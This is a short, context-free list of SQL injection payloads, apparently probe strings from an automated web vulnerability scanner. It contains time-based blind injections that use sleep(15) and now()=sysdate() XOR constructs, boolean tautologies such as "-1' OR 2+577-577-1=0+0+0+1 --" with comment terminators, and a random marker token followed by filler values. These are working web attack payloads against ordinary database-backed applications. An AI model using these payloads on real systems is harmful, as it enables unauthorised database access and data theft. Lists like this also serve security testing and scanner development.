(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+640-640-1=0+0+0+1 --

-1' OR 2+577-577-1=0+0+0+1 or 'LVIKIg23'='

-1' OR 2+941-941-1=0+0+0+1 --

-1 OR 2+646-646-1=0+0+0+1

-1 OR 2+523-523-1=0+0+0+1 --

HwEqFK4X

1

1

1

1

1

1

1

1

1

1

1